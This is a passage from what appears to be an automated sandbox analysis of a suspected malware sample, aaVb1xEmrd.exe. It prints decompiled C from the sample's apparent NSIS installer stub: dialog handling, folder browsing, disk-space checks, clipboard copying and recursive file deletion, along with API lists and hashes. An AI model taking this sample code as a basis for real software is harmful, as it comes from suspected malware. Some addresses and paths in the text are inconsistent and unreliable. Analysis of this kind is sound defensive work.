                                                                      					} else {
                                                                      						ShowWindow(_v8, 8);
                                                                      					}
                                                                      				}
                                                                      				_t157 = GetDlgItem(_a4, 0x3ec);
                                                                      				SendMessageA(_t157, 0x401, _t148, 0x75300000);   // PBM_SETRANGE 0..30000
                                                                      				if(( *0x42f030 & 0x00000004) != 0) {   // bit 4: coloured progress bar
                                                                      					SendMessageA(_t157, 0x409, _t148, _a8);    // PBM_SETBARCOLOR
                                                                      					SendMessageA(_t157, 0x2001, _t148, _a12);  // PBM_SETBKCOLOR
                                                                      				}
                                                                      				goto L36;
                                                                      			}

                                                                      (Instruction addresses of E00404EA7, 0x00404eb5 to 0x0040521b, one per C-code statement; the matching assembly is not in this extract.)
                                                                      0x00404ec9
                                                                      0x00404ecd
                                                                      0x00404ed6
                                                                      0x00404edd
                                                                      0x00404ee0
                                                                      0x00404ee3
                                                                      0x00404ee6
                                                                      0x00404ee7
                                                                      0x00404ee8
                                                                      0x00404f01
                                                                      0x00404f04
                                                                      0x00404f0e
                                                                      0x00404f1d
                                                                      0x00404f25
                                                                      0x00404f2d
                                                                      0x00404f32
                                                                      0x00404f35
                                                                      0x00404f41
                                                                      0x00404f4a
                                                                      0x00404f53
                                                                      0x00404f76
                                                                      0x00404f7c
                                                                      0x00404f8d
                                                                      0x00404f92
                                                                      0x00404fa0
                                                                      0x00404fae
                                                                      0x00404fae
                                                                      0x00404fb3
                                                                      0x00404fc1
                                                                      0x00404fc1
                                                                      0x00404fc6
                                                                      0x00404fc9
                                                                      0x00404fce
                                                                      0x00404fda
                                                                      0x00404fe3
                                                                      0x00404ff0
                                                                      0x00404fff
                                                                      0x00404ff2
                                                                      0x00404ff7
                                                                      0x00404ff7
                                                                      0x00404ff0
                                                                      0x00405014
                                                                      0x0040501d
                                                                      0x00405026
                                                                      0x00405036
                                                                      0x00405042
                                                                      0x00405042
                                                                      0x00000000

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 00404F07
                                                                      • GetDlgItem.USER32 ref: 00404F16
                                                                      • GetDlgItem.USER32 ref: 00404F25
                                                                        • Part of subcall function 00403DE4: SendMessageA.USER32(00000028,?,00000001,00403C17), ref: 00403DF2
                                                                      • GetClientRect.USER32 ref: 00404F53
                                                                      • GetSystemMetrics.USER32 ref: 00404F5B
                                                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404F7C
                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404F8D
                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 00404FA0
                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 00404FAE
                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404FC1
                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00404FE3
                                                                      • ShowWindow.USER32(?,00000008), ref: 00404FF7
                                                                      • GetDlgItem.USER32 ref: 0040500D
                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040501D
                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405036
                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405042
                                                                      • GetDlgItem.USER32 ref: 0040505E
                                                                      • CreateThread.KERNEL32 ref: 0040506C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405073
                                                                      • ShowWindow.USER32(00000000), ref: 00405096
                                                                      • ShowWindow.USER32(?,00000008), ref: 0040509D
                                                                      • ShowWindow.USER32(00000008), ref: 004050E0
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405114
                                                                      • CreatePopupMenu.USER32 ref: 00405125
                                                                      • AppendMenuA.USER32 ref: 0040513A
                                                                      • GetWindowRect.USER32 ref: 0040514F
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405173
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051AF
                                                                      • OpenClipboard.USER32(00000000), ref: 004051BF
                                                                      • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 004051C5
                                                                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004051CE
                                                                      • GlobalLock.KERNEL32 ref: 004051D8
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004051EC
                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405204
                                                                      • SetClipboardData.USER32 ref: 0040520F
                                                                      • CloseClipboard.USER32 ref: 00405215
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                      • String ID:
                                                                      • API String ID: 590372296-0
                                                                      • Opcode ID: 059c8a88734144d064b442f224168d5c0128116e7816f1b17e35158b87d491bc
                                                                      • Instruction ID: 0c87cf74621d28695fff580983f0b59ae02cf5e4fdabc25a535abfb09c427772
                                                                      • Opcode Fuzzy Hash: 059c8a88734144d064b442f224168d5c0128116e7816f1b17e35158b87d491bc
                                                                      • Instruction Fuzzy Hash: 37A15A71900209BFDB119FA0DD89EAE7FB9FB44354F40413AFA04BA2A0C7755E419FA9
                                                                      Uniqueness
                                                                      • Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E004041ED(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                      				int _v8;
                                                                      				signed int _v12;
                                                                      				long _v16;
                                                                      				long _v20;
                                                                      				char _v24;
                                                                      				long _v28;
                                                                      				char _v32;
                                                                      				intOrPtr _v36;
                                                                      				long _v40;
                                                                      				signed int _v44;
                                                                      				CHAR* _v52;
                                                                      				intOrPtr _v56;
                                                                      				intOrPtr _v60;
                                                                      				intOrPtr _v64;
                                                                      				CHAR* _v68;
                                                                      				void _v72;
                                                                      				char _v76;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				intOrPtr _t75;
                                                                      				signed char* _t80;
                                                                      				intOrPtr* _t81;
                                                                      				int _t86;
                                                                      				int _t88;
                                                                      				int _t100;
                                                                      				signed int _t105;
                                                                      				char* _t110;
                                                                      				intOrPtr _t113;
                                                                      				intOrPtr* _t127;
                                                                      				signed int _t139;
                                                                      				signed int _t144;
                                                                      				CHAR* _t150;
                                                                      
                                                                      				_t75 =  *0x429c58;
                                                                      				_v36 = _t75;
                                                                      				_t150 = ( *(_t75 + 0x3c) << 0xa) + 0x430000;
                                                                      				_v12 =  *((intOrPtr*)(_t75 + 0x38));
                                                                      				if(_a8 == 0x40b) {
                                                                      					E0040527E(0x3fb, _t150);
                                                                      					E00405BD3(_t150);
                                                                      				}
                                                                      				if(_a8 != 0x110) {
                                                                      					L8:
                                                                      					if(_a8 != 0x111) {
                                                                      						L20:
                                                                      						if(_a8 == 0x40f) {
                                                                      							L22:
                                                                      							_v8 = _v8 & 0x00000000;
                                                                      							_v12 = _v12 & 0x00000000;
                                                                      							_t144 = _t143 | 0xffffffff;
                                                                      							E0040527E(0x3fb, _t150);
                                                                      							if(E0040557D(_t169, _t150) == 0) {
                                                                      								_v8 = 1;
                                                                      							}
                                                                      							E004059A4(0x429450, _t150);
                                                                      							_t80 = E00405530(0x429450);
                                                                      							if(_t80 != 0) {
                                                                      								 *_t80 =  *_t80 & 0x00000000;
                                                                      							}
                                                                      							_t81 = E00405CAA("KERNEL32.dll", "GetDiskFreeSpaceExA");
                                                                      							if(_t81 == 0) {
                                                                      								L29:
                                                                      								_t86 = GetDiskFreeSpaceA(0x429450,  &_v20,  &_v28,  &_v16,  &_v40);
                                                                      								__eflags = _t86;
                                                                      								if(_t86 == 0) {
                                                                      									goto L32;
                                                                      								}
                                                                      								_t100 = _v20 * _v28;
                                                                      								__eflags = _t100;
                                                                      								_t144 = MulDiv(_t100, _v16, 0x400);
                                                                      								goto L31;
                                                                      							} else {
                                                                      								_push( &_v32);
                                                                      								_push( &_v24);
                                                                      								_push( &_v44);
                                                                      								_push(0x429450);
                                                                      								if( *_t81() == 0) {
                                                                      									goto L29;
                                                                      								}
                                                                      								_t144 = (_v40 << 0x00000020 | _v44) >> 0xa;
                                                                      								L31:
                                                                      								_v12 = 1;
                                                                      								L32:
                                                                      								if(_t144 < E0040460B(5)) {
                                                                      									_v8 = 2;
                                                                      								}
                                                                      								if( *((intOrPtr*)( *0x42e7fc + 0x10)) != 0) {
                                                                      									E00404556(0x3ff, 0xfffffffb, _t87);
                                                                      									if(_v12 == 0) {
                                                                      										SetDlgItemTextA(_a4, 0x400, 0x429440);
                                                                      									} else {
                                                                      										E00404556(0x400, 0xfffffffc, _t144);
                                                                      									}
                                                                      								}
                                                                      								_t88 = _v8;
                                                                      								 *0x42f0c4 = _t88;
                                                                      								if(_t88 == 0) {
                                                                      									_v8 = E00401410(7);
                                                                      								}
                                                                      								if(( *(_v36 + 0x14) & 0x00000400) != 0) {
                                                                      									_v8 = 0;
                                                                      								}
                                                                      								E00403DD1(0 | _v8 == 0x00000000);
                                                                      								if(_v8 == 0 &&  *0x42a474 == 0) {
                                                                      									E00404182();
                                                                      								}
                                                                      								 *0x42a474 = 0;
                                                                      								goto L46;
                                                                      							}
                                                                      						}
                                                                      						_t169 = _a8 - 0x405;
                                                                      						if(_a8 != 0x405) {
                                                                      							goto L46;
                                                                      						}
                                                                      						goto L22;
                                                                      					}
                                                                      					_t105 = _a12 & 0x0000ffff;
                                                                      					if(_t105 != 0x3fb) {
                                                                      						L12:
                                                                      						if(_t105 == 0x3e9) {
                                                                      							_t139 = 7;
                                                                      							memset( &_v72, 0, _t139 << 2);
                                                                      							_t143 = 0x42a488;
                                                                      							_v76 = _a4;
                                                                      							_v68 = 0x42a488;
                                                                      							_v56 = E004044F0;
                                                                      							_v52 = _t150;
                                                                      							_v64 = E004059C6(0x3fb, 0x42a488, _t150);
                                                                      							_t110 =  &_v76;
                                                                      							_v60 = 0x41;
                                                                      							__imp__SHBrowseForFolderA(_t110, 0x429858, _v12);
                                                                      							if(_t110 == 0) {
                                                                      								_a8 = 0x40f;
                                                                      							} else {
                                                                      								__imp__CoTaskMemFree(_t110);
                                                                      								E0040549D(_t150);
                                                                      								_t113 =  *((intOrPtr*)( *0x42f028 + 0x11c));
                                                                      								if(_t113 != 0 && _t150 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                                                      									_push(_t113);
                                                                      									_push(0);
                                                                      									E004059C6(0x3fb, 0x42a488, _t150);
                                                                      									_t143 = 0x42dfc0;
                                                                      									if(lstrcmpiA(0x42dfc0, 0x42a488) != 0) {
                                                                      										lstrcatA(_t150, 0x42dfc0);
                                                                      									}
                                                                      								}
                                                                      								 *0x42a474 =  *0x42a474 + 1;
                                                                      								SetDlgItemTextA(_a4, 0x3fb, _t150);
                                                                      							}
                                                                      						}
                                                                      						goto L20;
                                                                      					}
                                                                      					if(_a12 >> 0x10 != 0x300) {
                                                                      						goto L46;
                                                                      					}
                                                                      					_a8 = 0x40f;
                                                                      					goto L12;
                                                                      				} else {
                                                                      					_t143 = GetDlgItem(_a4, 0x3fb);
                                                                      					if(E00405509(_t150) != 0 && E00405530(_t150) == 0) {
                                                                      						E0040549D(_t150);
                                                                      					}
                                                                      					 *0x42e7f8 = _a4;
                                                                      					SetWindowTextA(_t143, _t150);
                                                                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                      					_push(1);
                                                                      					E00403DAF(_a4);
                                                                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                      					_push(0x14);
                                                                      					E00403DAF(_a4);
                                                                      					E00403DE4(_t143);
                                                                      					_t127 = E00405CAA("shlwapi.dll", "SHAutoComplete");
                                                                      					if(_t127 == 0) {
                                                                      						L46:
                                                                      						return E00403E16(_a8, _a12, _a16);
                                                                      					}
                                                                      					 *_t127(_t143, 1);
                                                                      					goto L8;
                                                                      				}
                                                                      			}
                                                                      0x0040440b
                                                                      0x00404443
                                                                      0x00404443
                                                                      0x0040444a
                                                                      0x00404453
                                                                      0x00404455
                                                                      0x00404455
                                                                      0x00404467
                                                                      0x00404471
                                                                      0x00404479
                                                                      0x0040448f
                                                                      0x0040447b
                                                                      0x0040447f
                                                                      0x0040447f
                                                                      0x00404479
                                                                      0x00404494
                                                                      0x00404499
                                                                      0x0040449e
                                                                      0x004044a7
                                                                      0x004044a7
                                                                      0x004044b0
                                                                      0x004044b2
                                                                      0x004044b2
                                                                      0x004044be
                                                                      0x004044c6
                                                                      0x004044d0
                                                                      0x004044d0
                                                                      0x004044d5
                                                                      0x00000000
                                                                      0x004044d5
                                                                      0x004043f0
                                                                      0x00404391
                                                                      0x00404398
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00404398
                                                                      0x004042b9
                                                                      0x004042bf
                                                                      0x004042d9
                                                                      0x004042de
                                                                      0x004042e8
                                                                      0x004042ef
                                                                      0x004042f4
                                                                      0x004042fe
                                                                      0x00404301
                                                                      0x00404304
                                                                      0x0040430b
                                                                      0x00404313
                                                                      0x00404316
                                                                      0x0040431a
                                                                      0x00404321
                                                                      0x00404329
                                                                      0x00404381
                                                                      0x0040432b
                                                                      0x0040432c
                                                                      0x00404333
                                                                      0x0040433d
                                                                      0x00404345
                                                                      0x0040434f
                                                                      0x00404350
                                                                      0x00404352
                                                                      0x00404358
                                                                      0x00404366
                                                                      0x0040436a
                                                                      0x0040436a
                                                                      0x00404366
                                                                      0x0040436f
                                                                      0x0040437a
                                                                      0x0040437a
                                                                      0x00404329
                                                                      0x00000000
                                                                      0x004042de
                                                                      0x004042cc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004042d2
                                                                      0x00000000
                                                                      0x00404234
                                                                      0x0040423f
                                                                      0x00404248
                                                                      0x00404255
                                                                      0x00404255
                                                                      0x0040425f
                                                                      0x00404264
                                                                      0x0040426d
                                                                      0x00404270
                                                                      0x00404275
                                                                      0x0040427d
                                                                      0x00404280
                                                                      0x00404285
                                                                      0x0040428b
                                                                      0x0040429a
                                                                      0x004042a1
                                                                      0x004044db
                                                                      0x004044ed
                                                                      0x004044ed
                                                                      0x004042aa
                                                                      0x00000000
                                                                      0x004042aa

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 00404238
                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404264
                                                                      • SHBrowseForFolderA.SHELL32(?,00429858,?), ref: 00404321
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0040432C
                                                                      • lstrcmpiA.KERNEL32(0042DFC0,0042A488,00000000,?,?), ref: 0040435E
                                                                      • SetDlgItemTextA.USER32 ref: 0040437A
                                                                      • lstrcatA.KERNEL32(?,0042DFC0), ref: 0040436A
                                                                        • Part of subcall function 0040527E: GetDlgItemTextA.USER32 ref: 00405291
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,*?|<>/":,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C2B
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C38
                                                                        • Part of subcall function 00405BD3: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C3D
                                                                        • Part of subcall function 00405BD3: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403135,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,0040328E), ref: 00405C4D
                                                                      • GetDiskFreeSpaceA.KERNEL32(00429450,?,?,0000040F,?,KERNEL32.dll,GetDiskFreeSpaceExA,00429450,00429450,?,?,000003FB,?), ref: 00404425
                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040443B
                                                                      • SetDlgItemTextA.USER32 ref: 0040448F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                      • String ID: A$C:\Users\user\AppData\Local\Temp$GetDiskFreeSpaceExA$KERNEL32.dll$SHAutoComplete$shlwapi.dll
                                                                      • API String ID: 2246997448-2494545068
                                                                      • Opcode ID: e44a68ac050da93dd24c92bf31600596efc48c1b45f7a76c2c12c5fd1fe0f47b
                                                                      • Instruction ID: 38b00ee318b9a2f141b332203b1ca97f43baab82eb53c12537abaa59d0bd0c71
                                                                      • Opcode Fuzzy Hash: e44a68ac050da93dd24c92bf31600596efc48c1b45f7a76c2c12c5fd1fe0f47b
                                                                      • Instruction Fuzzy Hash: 79817DB1A00218BBDF11AFA1DC45A9F7BB8EF44354F10407BFA04B62D1D77C9A418B69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 94%
                                                                      			// E004052DC: delete a file spec or a directory tree, steered by bits of _a8:
                                                                      			//   0x8  bare DeleteFileA on _a4, no enumeration
                                                                      			//   0x1  _a4 is a directory: enumerate "_a4\*.*" (only if 0x2 is set and E0040557D accepts the path),
                                                                      			//        then RemoveDirectoryA it
                                                                      			//   0x2  together with 0x1: recurse into subdirectories
                                                                      			//   0x4  when a delete or removal fails, report status 0xfffffff1 and pass the path to E004056F7(path, 0)
                                                                      			//        instead of incrementing the failure counter at 0x42f0a8
                                                                      			// The structure (flag bits, "\*.*" suffix, "."/".." skip, 8.3-name fallback, deferred-delete branch)
                                                                      			// matches the myDelete routine of the NSIS installer stub; identifiers below are the decompiler's.
                                                                      			E004052DC(void* __edi, void* __eflags, signed int _a4, signed int _a8) {
                                                                      				void* _v8;
                                                                      				signed int _v12;
                                                                      				struct _WIN32_FIND_DATAA _v332;
                                                                      				signed int _t38;
                                                                      				char* _t50;
                                                                      				signed int _t53;
                                                                      				signed int _t56;
                                                                      				signed int _t62;
                                                                      				signed int _t64;
                                                                      				void* _t66;
                                                                      				CHAR* _t67;
                                                                      				signed char _t68;
                                                                      				CHAR* _t71;
                                                                      				char* _t75;
                                                                      
                                                                      				_t67 = _a4;
                                                                      				_t38 = E0040557D(__eflags, _t67);
                                                                      				_t68 = _a8;
                                                                      				_v12 = _t38;
                                                                      				if((_t68 & 0x00000008) != 0) { // bit 0x8: plain DeleteFileA, no enumeration
                                                                      					_t64 = DeleteFileA(_t67);
                                                                      					asm("sbb eax, eax");
                                                                      					_t66 =  ~_t64 + 1; // 1 if DeleteFileA failed, else 0
                                                                      					 *0x42f0a8 =  *0x42f0a8 + _t66; // running count of failed deletes
                                                                      					return _t66;
                                                                      				}
                                                                      				_a4 = _t68;
                                                                      				_t7 =  &_a4;
                                                                      				 *_t7 = _a4 & 0x00000001; // _a4 now holds bit 0x1: "path is a directory"
                                                                      				__eflags =  *_t7;
                                                                      				if( *_t7 == 0) { // file spec (possibly wildcarded): enumerate its directory
                                                                      					L5:
                                                                      					E004059A4(0x42b490, _t67); // copy the path into the static search buffer at 0x42b490
                                                                      					__eflags = _a4;
                                                                      					if(_a4 == 0) {
                                                                      						E004054E4(_t67); // file spec: cut _t67 back to its directory part
                                                                      					} else {
                                                                      						lstrcatA(0x42b490, "\\*.*"); // directory: match every entry
                                                                      					}
                                                                      					lstrcatA(_t67, 0x409010); // append the separator string; each found name is then written at _t71
                                                                      					_t71 =  &(_t67[lstrlenA(_t67)]);
                                                                      					_t38 = FindFirstFileA(0x42b490,  &_v332);
                                                                      					__eflags = _t38 - 0xffffffff;
                                                                      					_v8 = _t38;
                                                                      					if(_t38 == 0xffffffff) {
                                                                      						L26:
                                                                      						__eflags = _a4;
                                                                      						if(_a4 != 0) {
                                                                      							_t32 = _t71 - 1;
                                                                      							 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                      							__eflags =  *_t32;
                                                                      						}
                                                                      						goto L28;
                                                                      					} else {
                                                                      						goto L9;
                                                                      					}
                                                                      					do {
                                                                      						L9:
                                                                      						_t75 =  &(_v332.cFileName);
                                                                      						_t50 = E004054C8( &(_v332.cFileName), 0x3f); // find '?' in cFileName
                                                                      						__eflags =  *_t50;
                                                                      						if( *_t50 != 0) {
                                                                      							__eflags = _v332.cAlternateFileName;
                                                                      							if(_v332.cAlternateFileName != 0) {
                                                                      								_t75 =  &(_v332.cAlternateFileName); // name not representable in ANSI: fall back to the 8.3 name
                                                                      							}
                                                                      						}
                                                                      						__eflags =  *_t75 - 0x2e;
                                                                      						if( *_t75 != 0x2e) { // names starting with '.' are checked further down for "." and ".."
                                                                      							L16:
                                                                      							E004059A4(_t71, _t75); // _t67 now reads <dir>\<entry>
                                                                      							__eflags = _v332.dwFileAttributes & 0x00000010;
                                                                      							if((_v332.dwFileAttributes & 0x00000010) == 0) { // not FILE_ATTRIBUTE_DIRECTORY
                                                                      								E00405661(_t67); // clear attributes that would block the delete (read-only)
                                                                      								_t53 = DeleteFileA(_t67);
                                                                      								__eflags = _t53;
                                                                      								if(_t53 != 0) {
                                                                      									E00404D69(0xfffffff2, _t67); // status: file deleted
                                                                      								} else {
                                                                      									__eflags = _a8 & 0x00000004;
                                                                      									if((_a8 & 0x00000004) == 0) {
                                                                      										 *0x42f0a8 =  *0x42f0a8 + 1; // count the failure
                                                                      									} else {
                                                                      										E00404D69(0xfffffff1, _t67); // bit 0x4: defer the delete instead of failing
                                                                      										_push(0);
                                                                      										_push(_t67);
                                                                      										E004056F7(); // E004056F7(_t67, 0): deferred delete, same shape as the NSIS stub's MoveFileOnReboot(path, NULL)
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								__eflags = (_a8 & 0x00000003) - 3;
                                                                      								if(__eflags == 0) { // subdirectory: recurse only when bits 0x1 and 0x2 are both set
                                                                      									E004052DC(_t71, __eflags, _t67, _a8);
                                                                      								}
                                                                      							}
                                                                      							goto L24;
                                                                      						}
                                                                      						_t62 =  *((intOrPtr*)(_t75 + 1));
                                                                      						__eflags = _t62;
                                                                      						if(_t62 == 0) {
                                                                      							goto L24;
                                                                      						}
                                                                      						__eflags = _t62 - 0x2e;
                                                                      						if(_t62 != 0x2e) {
                                                                      							goto L16;
                                                                      						}
                                                                      						__eflags =  *((char*)(_t75 + 2));
                                                                      						if( *((char*)(_t75 + 2)) == 0) {
                                                                      							goto L24;
                                                                      						}
                                                                      						goto L16;
                                                                      						L24:
                                                                      						_t56 = FindNextFileA(_v8,  &_v332);
                                                                      						__eflags = _t56;
                                                                      					} while (_t56 != 0);
                                                                      					_t38 = FindClose(_v8);
                                                                      					goto L26;
                                                                      				} else {
                                                                      					__eflags = _t38;
                                                                      					if(_t38 == 0) {
                                                                      						L28:
                                                                      						__eflags = _a4;
                                                                      						if(_a4 == 0) {
                                                                      							L36:
                                                                      							return _t38;
                                                                      						}
                                                                      						__eflags = _v12;
                                                                      						if(_v12 != 0) { // E0040557D accepted the path as a removable directory
                                                                      							_t38 = E00405C6C(_t67);
                                                                      							__eflags = _t38;
                                                                      							if(_t38 == 0) {
                                                                      								goto L36;
                                                                      							}
                                                                      							E0040549D(_t67);
                                                                      							E00405661(_t67); // clear read-only before RemoveDirectoryA
                                                                      							_t38 = RemoveDirectoryA(_t67); // fails if anything was left behind in the directory
                                                                      							__eflags = _t38;
                                                                      							if(_t38 != 0) {
                                                                      								return E00404D69(0xffffffe5, _t67); // status: directory removed
                                                                      							}
                                                                      							__eflags = _a8 & 0x00000004;
                                                                      							if((_a8 & 0x00000004) == 0) {
                                                                      								goto L30;
                                                                      							}
                                                                      							E00404D69(0xfffffff1, _t67); // bit 0x4: defer the removal, as for files
                                                                      							_push(0);
                                                                      							_push(_t67);
                                                                      							return E004056F7();
                                                                      						}
                                                                      						L30:
                                                                      						 *0x42f0a8 =  *0x42f0a8 + 1; // count the failure (also reached when E0040557D rejects the path)
                                                                      						return _t38;
                                                                      					}
                                                                      					__eflags = _t68 & 0x00000002;
                                                                      					if((_t68 & 0x00000002) == 0) {
                                                                      						goto L28;
                                                                      					}
                                                                      					goto L5;
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      • DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 004052FC
                                                                      • lstrcatA.KERNEL32(0042B490,\*.*,0042B490,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 00405345
                                                                      • lstrcatA.KERNEL32(?,00409010,?,0042B490,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 00405358
                                                                      • lstrlenA.KERNEL32(?,?,00409010,?,0042B490,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 0040535E
                                                                      • FindFirstFileA.KERNEL32(0042B490,?,?,?,00409010,?,0042B490,?,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,00000000), ref: 0040536F
                                                                      • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 00405421
                                                                      • FindClose.KERNEL32(?), ref: 00405432
                                                                      Strings
                                                                      • \*.*, xrefs: 0040533F
                                                                      • "C:\Users\user\Desktop\aaVb1xEmrd.exe" , xrefs: 004052E9
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405315
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229411654.0000000000407000.00000002.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229466151.0000000000409000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229645583.000000000042C000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229681609.0000000000435000.00000004.00020000.sdmp
                                                                      • Associated: 00000001.00000002.229751992.0000000000438000.00000002.00020000.sdmp
                                                                      Similarity
                                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                      • String ID: "C:\Users\user\Desktop\aaVb1xEmrd.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                      • API String ID: 2035342205-1463722233
                                                                      • Opcode ID: d2c76cd9e628d8186c0b895e2dc83b54db85f20e7ce0a50c644a367ebea546ed
                                                                      • Instruction ID: ef095529ff986d63dc264fe90b6339a07cda3a46ea2ad7dd50420250dcb54f18
                                                                      • Opcode Fuzzy Hash: d2c76cd9e628d8186c0b895e2dc83b54db85f20e7ce0a50c644a367ebea546ed
                                                                      • Instruction Fuzzy Hash: 8641B0B0404A18BADB21AB718C86BEF3A68DF01359F14857BB945B51D3C67C8DC18E6D
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00405C6C(CHAR* _a4) {
                                                                      				void* _t8;
                                                                      
                                                                      				SetErrorMode(0x8001);
                                                                      				_t8 = FindFirstFileA(_a4, 0x42c4d8);
                                                                      				SetErrorMode(0);
                                                                      				if(_t8 == 0xffffffff) {
                                                                      					return 0;
                                                                      				}
                                                                      				FindClose(_t8);
                                                                      				return 0x42c4d8;
                                                                      			}

                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00008001,00000000,0042B890,?,004055C0,0042B890,0042B890,00000000,0042B890,0042B890,?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ,004052F0,?,"C:\Users\user\Desktop\aaVb1xEmrd.exe" ), ref: 00405C7A
                                                                      • FindFirstFileA.KERNEL32(?,0042C4D8), ref: 00405C86
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00405C90
                                                                      • FindClose.KERNEL32(00000000), ref: 00405C98
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.229336526.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000001.00000002.229324634.0000000000400000.00000002.00020000.sdmp
